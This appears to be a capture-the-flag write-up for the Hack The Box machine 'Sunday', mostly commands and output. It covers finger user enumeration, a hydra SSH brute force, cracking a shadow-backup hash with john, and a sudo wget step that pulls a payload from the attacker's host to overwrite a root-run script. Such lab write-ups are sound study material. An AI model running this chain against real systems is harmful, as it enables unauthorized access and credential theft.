Hack The Box : Sunday
21 July, 2021
Beginning with an nmap scan
# nmap -A -sC -sV -O 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-21 04:23 EDT
Nmap scan report for 10.10.10.76
Host is up (0.51s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
79/tcp open finger?
|_finger: No one logged on\x0D
| fingerprint-strings:
| GenericLines:
|_ No one logged on
111/tcp open rpcbind
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port79-TCP:V=7.91%I=7%D=7/21%Time=60F7D9EB%P=x86_64-pc-linux-gnu%r(Gene
SF:ricLines,12,"No\x20one\x20logged\x20on\r\n");
Aggressive OS guesses: Sun Solaris 10 (94%), Sun OpenSolaris 2008.11 (94%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (94%), Sun Solaris 9 or 10 (SPARC) (92%), Sun Storage 7210 NAS device (92%), Sun Solaris 9 or 10 (92%), Oracle Solaris 11 (91%), Sun Solaris 8 (SPARC) (91%), Sun Solaris 8 (91%), Sun Solaris 9 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 199/tcp)
HOP RTT ADDRESS
1 385.09 ms 10.10.16.1
2 207.26 ms 10.10.10.76
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 166.56 seconds
I ran another a few more scans on higher ports and found SSH to be running as well
# nmap -A -sC -sV -p 20000-25000 10.10.10.76
Starting Nmap 7.91 ( https://nmap.org )
Nmap scan report for 10.10.10.76
Host is up (0.36s latency).
Not shown: 5000 closed ports
PORT STATE SERVICE VERSION
22022/tcp open ssh SunSSH 1.3 (protocol 2.0)
| ssh-hostkey:
| 1024 d2:e5:cb:bd:33:c7:01:31:0b:3c:63:d9:82:d9:f1:4e (DSA)
|_ 1024 e4:2c:80:62:cf:15:17:79:ff:72:9d:df:8b:a6:c9:ac (RSA)
Aggressive OS guesses: Sun Solaris 10 (94%), Sun OpenSolaris 2008.11 (93%), Sun Solaris 9 or 10 (93%), Sun Solaris 9 or 10 (SPARC) (93%), Sun Solaris 9 or 10, or OpenSolaris 2009.06 snv_111b (93%), Sun Solaris 10 (SPARC) (93%), Sun Storage 7210 NAS device (91%), Joyent SmartOS (90%), Oracle Solaris 11 (90%), Sun Solaris 8 (SPARC) (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 430.50 ms 10.10.16.1
2 430.62 ms 10.10.10.76
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 642.50 seconds
Starting off with enumerating port 79, it is running the finger daemon, let's try to enumerate the users.
# nc -vn 10.10.10.76 79
(UNKNOWN) [10.10.10.76] 79 (finger) open
root
Login Name TTY Idle When Where
root Super-User pts/3 <Apr 24, 2018> sunday
I used finger-user-enum.pl with a username list from Seclists to see which users will come up
./finger-user-enum.pl -U ./wordlists/names.txt -t 10.10.10.76
Starting finger-user-enum v1.0 ( http://pentestmonkey.net/tools/finger-user-enum )
----------------------------------------------------------
| Scan Information |
----------------------------------------------------------
Worker Processes ......... 5
Usernames file ........... ./wordlists/names.txt
Target count ............. 1
Username count ........... 10177
Target TCP port .......... 79
Query timeout ............ 5 secs
Relay Server ............. Not used
access@10.10.10.76: access No Access User < . . . . >..nobody4 SunOS 4.x NFS Anonym < . . . . >..
admin@10.10.10.76: Login Name TTY Idle When Where..adm Admin < . . . . >..lp Line Printer Admin < . . . . >..uucp uucp Admin < . . . . >..nuucp uucp Admin < . . . . >..dladm Datalink Admin < . . . . >..listen Network Admin < . . . . >..
anne marie@10.10.10.76: Login Name TTY Idle When Where..anne ???..marie ???..
bin@10.10.10.76: bin ??? < . . . . >..
dee dee@10.10.10.76: Login Name TTY Idle When Where..dee ???..dee ???..
jo ann@10.10.10.76: Login Name TTY Idle When Where..jo ???..ann ???..
la verne@10.10.10.76: Login Name TTY Idle When Where..la ???..verne ???..
line@10.10.10.76: Login Name TTY Idle When Where..lp Line Printer Admin < . . . . >..
miof mela@10.10.10.76: Login Name TTY Idle When Where..miof ???..mela ???..
root@10.10.10.76: root Super-User pts/3 <Apr 24, 2018> sunday ..
sammy@10.10.10.76: sammy console <Jul 31, 2020>..
sunny@10.10.10.76: sunny pts/3 <Apr 24, 2018> 10.10.14.4 ..
sys@10.10.10.76: sys ??? < . . . . >..
######## Scan completed #########
13 results.
10177 queries in 3688 seconds (2.8 queries / sec)
I created a list of possible users and since there was nothing more to look around, I thought of brute forcing the SSH password
# hydra -v -V -u -L users -P rockyou.txt -t 1 -u 10.10.10.76 -s 22022 ssh
...
[22022][ssh] host: 10.10.10.76 login: sunny password: sunday
...
So now I have ssh credentials sunny:sunday
# ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -p 22022 sunny@10.10.10.76
The authenticity of host '[10.10.10.76]:22022 ([10.10.10.76]:22022)' can't be established.
RSA key fingerprint is SHA256:TmRO9yKIj8Rr/KJIZFXEVswWZB/hic/jAHr78xGp+YU.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.10.10.76]:22022' (RSA) to the list of known hosts.
Password:
Last login: Wed Jul 21 17:17:24 2021 from 10.10.16.174
Sun Microsystems Inc. SunOS 5.11 snv_111b November 2008
sunny@sunday:~$ id
uid=65535(sunny) gid=1(other) groups=1(other)
sunny@sunday:~$ whoami
sunny
sunny@sunday:/home$ cat /etc/passwd
root:x:0:0:Super-User:/root:/usr/bin/bash
daemon:x:1:1::/:
bin:x:2:2::/usr/bin:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
dladm:x:15:3:Datalink Admin:/:
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
zfssnap:x:51:12:ZFS Automatic Snapshots Reserved UID:/:/usr/bin/pfsh
xvm:x:60:60:xVM User:/:
mysql:x:70:70:MySQL Reserved UID:/:
openldap:x:75:75:OpenLDAP User:/:
webservd:x:80:80:WebServer Reserved UID:/:
postgres:x:90:90:PostgreSQL Reserved UID:/:/usr/bin/pfksh
svctag:x:95:12:Service Tag UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
sammy:x:101:10:sammy:/export/home/sammy:/bin/bash
sunny:x:65535:1:sunny:/export/home/sunny:/bin/bash
The user flag wasn't present in sunny's directories, so I used find to see where it is and it was in sammy's Desktop which sunny wasn't able to access it.
sunny@sunday:/home$ find / -name user.txt 2>/dev/null
/export/home/sammy/Desktop/user.txt
sunny@sunday:/home$ cat /export/home/sammy/Desktop/user.txt
cat: /export/home/sammy/Desktop/user.txt: Permission denied
Looking around sunny was allowed to run /root/troll as root
sunny@sunday:~$ cat /root/troll
cat: /root/troll: Permission denied
sunny@sunday:~$ sudo /root/troll
testing
uid=0(root) gid=0(root)
sunny didn't have r/w access to this program so looks like it isn't useful for now.
I found a backup of /etc/shadow at /backup/shadow.backup
sunny@sunday:/backup$ cat shadow.backup
mysql:NP:::::::
openldap:*LK*:::::::
webservd:*LK*:::::::
postgres:NP:::::::
svctag:*LK*:6445::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
sammy:$5$Ebkn8jlK$i6SSPa0.u7Gd.0oJOT4T421N2OvsfXqAT1vCoYUOigB:6445::::::
sunny:$5$iRMbpnBv$Zh7s6D7ColnogCdiVE5Flz9vCZOMkUFxklRhhaShxv3:17636::::::
I used john to crack the hash and a match was found
# john --wordlist=../../wordlists/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha256crypt, crypt(3) $5$ [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
cooldude! (?)
1g 0:00:03:51 DONE 0.004319g/s 880.1p/s 880.1c/s 880.1C/s daddyzgurl..chrystelle
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Using this I was able to switch to sammy and get the user flag
sammy@sunday:~$ id
uid=101(sammy) gid=10(staff) groups=10(staff)
sammy@sunday:~$ whoami
sammy
sammy@sunday:~$ cd Desktop
sammy@sunday:~/Desktop$ ls
user.txt
sammy was allowed to run wget as root without password
sammy@sunday:~$ sudo -l
User sammy may run the following commands on this host:
(root) NOPASSWD: /usr/bin/wget
My plan was to overwrite /root/troll using wget by running it as root, and then execute /root/troll as root using sunny's permissions
# echo "/bin/bash -p" > troll
sammy@sunday:~$ sudo wget http://10.10.16.174:8000/troll -O /root/troll
--18:27:36-- http://10.10.16.174:8000/troll
=> `/root/troll'
Connecting to 10.10.16.174:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13 [application/octet-stream]
100%[=================================================================================================================================================================================================>] 13 --.--K/s
18:27:37 (2.72 MB/s) - `/root/troll' saved [13/13]
sunny@sunday:~$ sudo /root/troll
root@sunday:~# id
uid=0(root) gid=0(root) groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(lp),9(nuucp),12(daemon)
root@sunday:~# whoami
root
root@sunday:~#
root@sunday:~# cat /root/root.txt
The time difference between downloading and executing /root/troll has to be very less since there is something running that is overwriting it to the original pretty quickly